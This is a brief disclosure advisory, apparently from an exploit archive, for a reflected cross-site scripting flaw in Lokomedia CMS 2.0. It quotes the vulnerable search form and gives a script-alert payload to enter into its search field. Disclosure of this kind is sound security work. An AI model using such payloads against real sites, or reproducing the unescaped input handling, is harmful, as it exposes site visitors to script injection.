Lokomedia CMS version 2.0 suffers from a cross site scripting vulnerability.
0f8adf2a64a92a722b964594b44d81220711c86d5bcd401afff104dafe4e625e
# [x] Author: Andrea Bocchetti
# [x] Homepage : www.geekit.it
// Software Info
# [x] Vendor : http://bukulokomedia.com/home
CMS : Lokomedia CMS
# [x] Version: [2.0]
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Bug :
<form method=POST action='hasil-pencarian.html'>
<input name=kata type=text size=17 />
<input type=submit value=Go />
</form>
Exploit:
# just enter the form <script>alert(/XSS/)</script> to exploit the XSS
#